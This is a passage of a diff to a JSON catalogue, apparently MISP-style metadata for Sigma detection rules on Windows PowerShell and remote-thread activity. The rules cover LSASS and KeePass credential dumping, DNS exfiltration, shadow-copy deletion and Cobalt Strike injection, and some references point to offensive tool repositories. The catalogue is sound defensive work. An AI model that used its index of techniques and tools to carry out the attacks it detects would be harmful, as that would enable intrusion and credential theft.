Execution" + }, + { + "description": "Detects Commandlet names from well-known PowerShell exploitation frameworks", + "meta": { + "author": "Sean Metcalf (source), Florian Roth (rule), Bartlomiej Czyz @bczyz1 (update), oscd.community (update), Nasreddine Bencherchali (update), Tim Shelton (fp), Mustafa Kaan Demir (update), Georg Lauenstein (update), Max Altgelt (update), Tobias Michalski (update), Austin Songer (@austinsonger) (update)", + "creation_date": "2017/03/05", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_malicious_commandlets.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/", + "https://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1", + "https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1", + "https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1", + "https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1", + "https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries", + "https://adsecurity.org/?p=2921", + "https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/", + "https://github.com/calebstewart/CVE-2021-1675", + "https://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html", + "https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_malicious_commandlets.yml" + ], + "tags": [ + "attack.execution", + "attack.discovery", + "attack.t1482", + "attack.t1087", + "attack.t1087.001", + "attack.t1087.002", + "attack.t1069.001", + "attack.t1069.002", + 
"attack.t1069", + "attack.t1059.001" + ] + }, + "uuid": "89819aa4-bbd6-46bc-88ec-c7f7fe30efa6", + "value": "Malicious PowerShell Commandlets - ScriptBlock" + }, + { + "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", + "meta": { + "author": "Timur Zinniatullin, oscd.community", + "creation_date": "2020/10/13", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_invoke_obfuscation_via_var.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_var.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "e54f5149-6ba3-49cf-b153-070d24679126", + "value": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell" + }, + { + "description": "Identifies when a user attempts to clear console history. 
An adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/11/25", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_clearing_windows_console_history.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://community.sophos.com/sophos-labs/b/blog/posts/powershell-command-history-forensics", + "https://stefanos.cloud/blog/kb/how-to-clear-the-powershell-command-history/", + "https://www.shellhacks.com/clear-history-powershell/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_clearing_windows_console_history.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070", + "attack.t1070.003" + ] + }, + "uuid": "bde47d4b-9987-405c-94c7-b080410e8ea7", + "value": "Clearing Windows Console History" + }, + { + "description": "Adversaries may abuse PowerShell commands and scripts for execution.\nPowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. 
(Citation: TechNet PowerShell)\nAdversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code\n", + "meta": { + "author": "frack113", + "creation_date": "2022/01/19", + "falsepositive": [ + "Legitimate administrative script" + ], + "filename": "posh_ps_xml_iex.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.001/T1059.001.md#atomic-test-8---powershell-xml-requests", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_xml_iex.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "6c6c6282-7671-4fe9-a0ce-a2dcebdc342b", + "value": "Powershell XML Execute Command" + }, + { + "description": "Detects suspicious PowerShell invocation command parameters", + "meta": { + "author": "Florian Roth (rule), Jonhnathan Ribeiro", + "creation_date": "2017/03/05", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_susp_invocation_specific.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_invocation_specific.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "ae7fbf8e-f3cb-49fd-8db4-5f3bed522c71", + "value": "Suspicious PowerShell Invocations - Specific" + }, + { + "description": "Detects modifications to the Windows Defender configuration settings using PowerShell to add exclusions", + "meta": { + "author": "Tim Rauch", + "creation_date": "2022/09/16", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_win_defender_exclusions_added.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + 
"https://www.elastic.co/guide/en/security/current/windows-defender-exclusions-added-via-powershell.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_win_defender_exclusions_added.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562", + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "c1344fa2-323b-4d2e-9176-84b4d4821c88", + "value": "Windows Defender Exclusions Added - PowerShell" + }, + { + "description": "Detect use of X509Enrollment", + "meta": { + "author": "frack113", + "creation_date": "2022/12/23", + "falsepositive": [ + "Legitimate administrative script" + ], + "filename": "posh_ps_x509enrollment.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=41", + "https://learn.microsoft.com/en-us/dotnet/api/microsoft.hpc.scheduler.store.cx509enrollmentwebclassfactoryclass?view=hpc-sdk-5.1.6115", + "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=42", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_x509enrollment.yml" + ], + "tags": "No established tags" + }, + "uuid": "504d63cb-0dba-4d02-8531-e72981aace2c", + "value": "Suspicious X509Enrollment - Ps Script" + }, + { + "description": "Detects Commandlet names and arguments from the Nishang exploitation framework", + "meta": { + "author": "Alec Costello", + "creation_date": "2019/05/16", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_nishang_malicious_commandlets.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/samratashok/nishang", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_nishang_malicious_commandlets.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": 
"f772cee9-b7c2-4cb2-8f07-49870adc02e0", + "value": "Malicious Nishang PowerShell Commandlets" + }, + { + "description": "Detects suspicious Powershell code that execute COM Objects", + "meta": { + "author": "frack113", + "creation_date": "2022/04/02", + "falsepositive": [ + "Legitimate PowerShell scripts" + ], + "filename": "posh_ps_susp_gettypefromclsid.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.015/T1546.015.md#atomic-test-2---powershell-execute-com-object", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_gettypefromclsid.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.persistence", + "attack.t1546.015" + ] + }, + "uuid": "8bc063d5-3a3a-4f01-a140-bc15e55e8437", + "value": "Suspicious GetTypeFromCLSID ShellExecute" + }, + { + "description": "Detects parameters used by WMImplant", + "meta": { + "author": "NVISO", + "creation_date": "2020/03/26", + "falsepositive": [ + "Administrative scripts that use the same keywords." 
+ ], + "filename": "posh_ps_wmimplant.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/FortyNorthSecurity/WMImplant", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_wmimplant.yml" + ], + "tags": [ + "attack.execution", + "attack.t1047", + "attack.t1059.001" + ] + }, + "uuid": "8028c2c3-e25a-46e3-827f-bbb5abf181d7", + "value": "WMImplant Hack Tool" + }, + { + "description": "Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR.\nThe COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR).\nThese profiliers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.\n(Citation: Microsoft Profiling Mar 2017)\n(Citation: Microsoft COR_PROFILER Feb 2013)\n", + "meta": { + "author": "frack113", + "creation_date": "2021/12/30", + "falsepositive": [ + "Legitimate administrative script" + ], + "filename": "posh_ps_cor_profiler.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.012/T1574.012.md#atomic-test-3---registry-free-process-scope-cor_profiler", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_cor_profiler.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1574.012" + ] + }, + "uuid": "23590215-4702-4a70-8805-8dc9e58314a2", + "value": "Registry-Free Process Scope COR_PROFILER" + }, + { + "description": "DNSExfiltrator allows for transferring (exfiltrate) a file over a DNS request covert channel", + "meta": { + "author": "frack113", + "creation_date": "2022/01/07", + 
"falsepositive": [ + "Legitimate script" + ], + "filename": "posh_ps_invoke_dnsexfiltration.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/Arno0x/DNSExfiltrator", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1048/T1048.md#atomic-test-3---dnsexfiltration-doh", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_dnsexfiltration.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1048" + ] + }, + "uuid": "d59d7842-9a21-4bc6-ba98-64bfe0091355", + "value": "Powershell DNSExfiltration" + }, + { + "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", + "meta": { + "author": "Nikita Nazarov, oscd.community", + "creation_date": "2020/10/08", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_invoke_obfuscation_via_use_mhsta.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_use_mhsta.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "e55a5195-4724-480e-a77e-3ebe64bd3759", + "value": "Invoke-Obfuscation Via Use MSHTA - PowerShell" + }, + { + "description": "Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription.", + "meta": { + "author": "frack113", + "creation_date": "2021/08/19", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_wmi_persistence.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + 
"https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/data/module_source/persistence/Persistence.psm1#L545", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.003/T1546.003.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_wmi_persistence.yml" + ], + "tags": [ "attack.privilege_escalation", "attack.t1546.003" ] }, - "uuid": "0b7889b4-5577-4521-a60a-3376ee7f9f7b", - "value": "WMI Persistence" + "uuid": "9e07f6e7-83aa-45c6-998e-0af26efd0a85", + "value": "Powershell WMI Persistence" + }, + { + "description": "Detects the use of various web request POST or PUT methods (including aliases) via Windows PowerShell command", + "meta": { + "author": "frack113", + "creation_date": "2022/01/07", + "falsepositive": [ + "Legitimate script" + ], + "filename": "posh_ps_upload.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/invoke-webrequest?view=powershell-7.2", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1020/T1020.md", + "https://www.w3.org/Protocols/rfc2616/rfc2616-sec9.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_upload.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1020" + ] + }, + "uuid": "d2e3f2f6-7e09-4bf2-bc5d-90186809e7fb", + "value": "Windows PowerShell Upload Web Request" + }, + { + "description": "Adversaries may abuse Microsoft Office add-ins to obtain persistence on a compromised system.\nOffice add-ins can be used to add functionality to Office programs\n", + "meta": { + "author": "frack113", + "creation_date": "2021/12/28", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_office_comobject_registerxll.yml", + "level": "high", + 
"logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1137.006/T1137.006.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_office_comobject_registerxll.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1137.006" + ] + }, + "uuid": "36fbec91-fa1b-4d5d-8df1-8d8edcb632ad", + "value": "Code Executed Via Office Add-in XLL File" + }, + { + "description": "Detects technique used by MAZE ransomware to enumerate directories using Powershell", + "meta": { + "author": "frack113", + "creation_date": "2022/03/17", + "falsepositive": [ + "Legitimate PowerShell scripts" + ], + "filename": "posh_ps_susp_directory_enum.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1083/T1083.md", + "https://www.mandiant.com/resources/tactics-techniques-procedures-associated-with-maze-ransomware-incidents", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_directory_enum.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1083" + ] + }, + "uuid": "162e69a7-7981-4344-84a9-0f1c9a217a52", + "value": "Powershell Directory Enumeration" + }, + { + "description": "Adversaries may enumerate browser bookmarks to learn more about compromised hosts.\nBrowser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) 
as well as details about\ninternal network resources such as servers, tools/dashboards, or other related infrastructure.\n", + "meta": { + "author": "frack113", + "creation_date": "2021/12/13", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_get_childitem_bookmarks.yml", + "level": "low", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1217/T1217.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_get_childitem_bookmarks.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1217" + ] + }, + "uuid": "e0565f5d-d420-4e02-8a68-ac00d864f9cf", + "value": "Automated Collection Bookmarks Using Get-ChildItem PowerShell" + }, + { + "description": "Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil", + "meta": { + "author": "Tim Rauch", + "creation_date": "2022/09/20", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_susp_win32_shadowcopy_deletion.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://www.elastic.co/guide/en/security/current/volume-shadow-copy-deletion-via-powershell.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_win32_shadowcopy_deletion.yml" + ], + "tags": [ + "attack.impact", + "attack.t1490" + ] + }, + "uuid": "c1337eb8-921a-4b59-855b-4ba188ddcc42", + "value": "Deletion of Volume Shadow Copies via WMI with PowerShell - PS Script" + }, + { + "description": "Detects Obfuscated use of Clip.exe to execute 
PowerShell", + "meta": { + "author": "Jonathan Cheong, oscd.community", + "creation_date": "2020/10/13", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_invoke_obfuscation_clip.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_clip.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "73e67340-0d25-11eb-adc1-0242ac120002", + "value": "Invoke-Obfuscation CLIP+ Launcher - PowerShell" + }, + { + "description": "Detects a Get-Process command on lsass process, which is in almost all cases a sign of malicious activity", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/04/23", + "falsepositive": [ + "Legitimate certificate exports invoked by administrators or users (depends on processes in the environment - filter if unusable)" + ], + "filename": "posh_ps_susp_getprocess_lsass.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/PythonResponder/status/1385064506049630211", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_getprocess_lsass.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ] + }, + "uuid": "84c174ab-d3ef-481f-9c86-a50d0b8e3edb", + "value": "PowerShell Get-Process LSASS in ScriptBlock" + }, + { + "description": "Open a handle on the drive volume via the \\\\.\\ DOS device path specifier and perform direct access read of the first few bytes of the volume.", + "meta": { + "author": "frack113", + "creation_date": "2022/01/09", + "falsepositive": [ + "Legitimate PowerShell scripts" + ], + "filename": "posh_ps_susp_iofilestream.yml", + "level": "medium", + "logsource.category": 
"ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1006/T1006.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_iofilestream.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.003" + ] + }, + "uuid": "70ad982f-67c8-40e0-a955-b920c2fa05cb", + "value": "Suspicious IO.FileStream" + }, + { + "description": "Detects Obfuscated Powershell via Stdin in Scripts", + "meta": { + "author": "Nikita Nazarov, oscd.community", + "creation_date": "2020/10/12", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_invoke_obfuscation_via_stdin.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_stdin.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "86b896ba-ffa1-4fea-83e3-ee28a4c915c7", + "value": "Invoke-Obfuscation Via Stdin - Powershell" + }, + { + "description": "Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.", + "meta": { + "author": "oscd.community, @redcanary, Zach Stanford @svch0st", + "creation_date": "2020/10/10", + "falsepositive": [ + "Help Desk or IT may need to manually add a corporate Root CA on occasion. 
Need to test if GPO push doesn't trigger FP" + ], + "filename": "posh_ps_root_certificate_installed.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_root_certificate_installed.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1553.004" + ] + }, + "uuid": "42821614-9264-4761-acfc-5772c3286f76", + "value": "Root Certificate Installed - PowerShell" + }, + { + "description": "Detects Execution via runAfterCancelProcess in CL_Mutexverifiers.ps1 module", + "meta": { + "author": "oscd.community, Natalia Shornikova", + "creation_date": "2020/10/14", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_cl_mutexverifiers_lolscript_count.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/pabraeken/status/995111125447577600", + "https://lolbas-project.github.io/lolbas/Scripts/CL_mutexverifiers/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_cl_mutexverifiers_lolscript_count.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1216" + ] + }, + "uuid": "6609c444-9670-4eab-9636-fe4755a851ce", + "value": "Execution via CL_Mutexverifiers.ps1 (2 Lines)" + }, + { + "description": "Raw disk access using illegitimate tools, possible defence evasion", + "meta": { + "author": "Teymur Kheirkhabarov, oscd.community", + "creation_date": "2019/10/22", + "falsepositive": [ + "Legitimate Administrator using tool for raw access or ongoing forensic investigation" + ], + "filename": "raw_access_thread_disk_access_using_illegitimate_tools.yml", + "level": "low", + "logsource.category": "raw_access_thread", + "logsource.product": "windows", + "refs": [ + 
"https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/raw_access_thread/raw_access_thread_disk_access_using_illegitimate_tools.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1006" + ] + }, + "uuid": "db809f10-56ce-4420-8c86-d6a7d793c79c", + "value": "Raw Disk Access Using Illegitimate Tools" + }, + { + "description": "Detects a possible remote threat creation with certain characteristics which are typical for Cobalt Strike beacons", + "meta": { + "author": "Olaf Hartong, Florian Roth, Aleksey Potapov, oscd.community", + "creation_date": "2018/11/30", + "falsepositive": [ + "Unknown" + ], + "filename": "create_remote_thread_win_cobaltstrike_process_injection.yml", + "level": "high", + "logsource.category": "create_remote_thread", + "logsource.product": "windows", + "refs": [ + "https://blog.cobaltstrike.com/2018/04/09/cobalt-strike-3-11-the-snake-that-eats-its-tail/", + "https://medium.com/@olafhartong/cobalt-strike-remote-threads-detection-206372d11d0f", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_cobaltstrike_process_injection.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1055.001" + ] + }, + "uuid": "6309645e-122d-4c5b-bb2b-22e4f9c2fa42", + "value": "CobaltStrike Process Injection" + }, + { + "description": "Detects the creation of a remote thread from a Powershell process to another process", + "meta": { + "author": "Nikita Nazarov, oscd.community", + "creation_date": "2020/10/06", + "falsepositive": [ + "Unknown" + ], + "filename": "create_remote_thread_win_powershell_code_injection.yml", + "level": "high", + "logsource.category": "create_remote_thread", + "logsource.product": "windows", + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_powershell_code_injection.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "eeb2e3dc-c1f4-40dd-9bd5-149ee465ad50", + "value": "Accessing WinAPI in PowerShell. Code Injection" + }, + { + "description": "Detects password dumper activity by monitoring remote thread creation EventID 8 in combination with the lsass.exe process as TargetImage.\nThe process in field Process is the malicious program. A single execution can lead to hundreds of events.\n", + "meta": { + "author": "Thomas Patzke", + "creation_date": "2017/02/19", + "falsepositive": [ + "Antivirus products" + ], + "filename": "create_remote_thread_win_password_dumper_lsass.yml", + "level": "high", + "logsource.category": "create_remote_thread", + "logsource.product": "windows", + "refs": [ + "https://jpcertcc.github.io/ToolAnalysisResultSheet/details/WCE.htm", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_password_dumper_lsass.yml" + ], + "tags": [ + "attack.credential_access", + "attack.s0005", + "attack.t1003.001" + ] + }, + "uuid": "f239b326-2f41-4d6b-9dfa-c846a60ef505", + "value": "Password Dumper Remote Thread in LSASS" }, { "description": "Detects remote thread injection events based on action seen used by bumblebee", 
@@ -20499,82 +22520,53 @@ "value": "Bumblebee Remote Thread Creation" }, { - "description": "Detects remote thread creation from CACTUSTORCH as described in references.", + "description": "Detects remote thread creation by PowerShell processes into \"lsass.exe\"", "meta": { - "author": "@SBousseaden (detection), Thomas Patzke (rule)", - "creation_date": "2019/02/01", + "author": "oscd.community, Natalia Shornikova", + "creation_date": "2020/10/06", "falsepositive": [ "Unknown" ], - "filename": "create_remote_thread_win_cactustorch.yml", + "filename": "create_remote_thread_win_winapi_in_powershell_credentials_dumping.yml", "level": "high", "logsource.category": "create_remote_thread", "logsource.product": "windows", "refs": [ - "https://twitter.com/SBousseaden/status/1090588499517079552", - "https://github.com/mdsecactivebreach/CACTUSTORCH", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_cactustorch.yml" + "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_winapi_in_powershell_credentials_dumping.yml" ], "tags": [ - "attack.defense_evasion", - "attack.t1055.012", - "attack.execution", - "attack.t1059.005", - "attack.t1059.007", - "attack.t1218.005" + "attack.credential_access", + "attack.t1003.001" ] }, - "uuid": "2e4e488a-6164-4811-9ea1-f960c7359c40", - "value": "CACTUSTORCH Remote Thread Creation" + "uuid": "fb656378-f909-47c1-8747-278bf09f4f4f", + "value": "Potential Credential Dumping Attempt Via PowerShell Remote Thread" }, { - "description": "Detects a possible remote threat creation with certain characteristics which are typical for Cobalt Strike beacons", + "description": "Detects a remote thread creation in suspicious target images", "meta": { - "author": "Olaf Hartong, Florian Roth, Aleksey Potapov, oscd.community", - "creation_date": "2018/11/30", + "author": "Florian 
Roth", + "creation_date": "2022/03/16", "falsepositive": [ "Unknown" ], - "filename": "create_remote_thread_win_cobaltstrike_process_injection.yml", + "filename": "create_remote_thread_win_susp_targets.yml", "level": "high", "logsource.category": "create_remote_thread", "logsource.product": "windows", "refs": [ - "https://medium.com/@olafhartong/cobalt-strike-remote-threads-detection-206372d11d0f", - "https://blog.cobaltstrike.com/2018/04/09/cobalt-strike-3-11-the-snake-that-eats-its-tail/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_cobaltstrike_process_injection.yml" + "https://blog.redbluepurple.io/offensive-research/bypassing-injection-detection", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_susp_targets.yml" ], "tags": [ "attack.defense_evasion", - "attack.t1055.001" + "attack.privilege_escalation", + "attack.t1055.003" ] }, - "uuid": "6309645e-122d-4c5b-bb2b-22e4f9c2fa42", - "value": "CobaltStrike Process Injection" - }, - { - "description": "Detects potential use of CreateRemoteThread api and LoadLibrary function to inject DLL into a process", - "meta": { - "author": "Roberto Rodriguez @Cyb3rWard0g", - "creation_date": "2019/08/11", - "falsepositive": [ - "Unknown" - ], - "filename": "create_remote_thread_win_loadlibrary.yml", - "level": "high", - "logsource.category": "create_remote_thread", - "logsource.product": "windows", - "refs": [ - "https://threathunterplaybook.com/notebooks/windows/05_defense_evasion/WIN-180719170510.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_loadlibrary.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1055.001" - ] - }, - "uuid": "052ec6f6-1adc-41e6-907a-f1c813478bee", - "value": "CreateRemoteThread API and LoadLibrary" + "uuid": "a1a144b7-5c9b-4853-a559-2172be8d4a03", + "value": "Remote Thread Creation in Suspicious 
Targets" }, { "description": "Detects remote thread creation in KeePass.exe indicating password dumping activity", @@ -20589,9 +22581,9 @@ "logsource.category": "create_remote_thread", "logsource.product": "windows", "refs": [ - "https://www.cisa.gov/uscert/ncas/alerts/aa20-259a", "https://github.com/denandz/KeeFarce", "https://github.com/GhostPack/KeeThief", + "https://www.cisa.gov/uscert/ncas/alerts/aa20-259a", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_password_dumper_keepass.yml" ], "tags": [ 
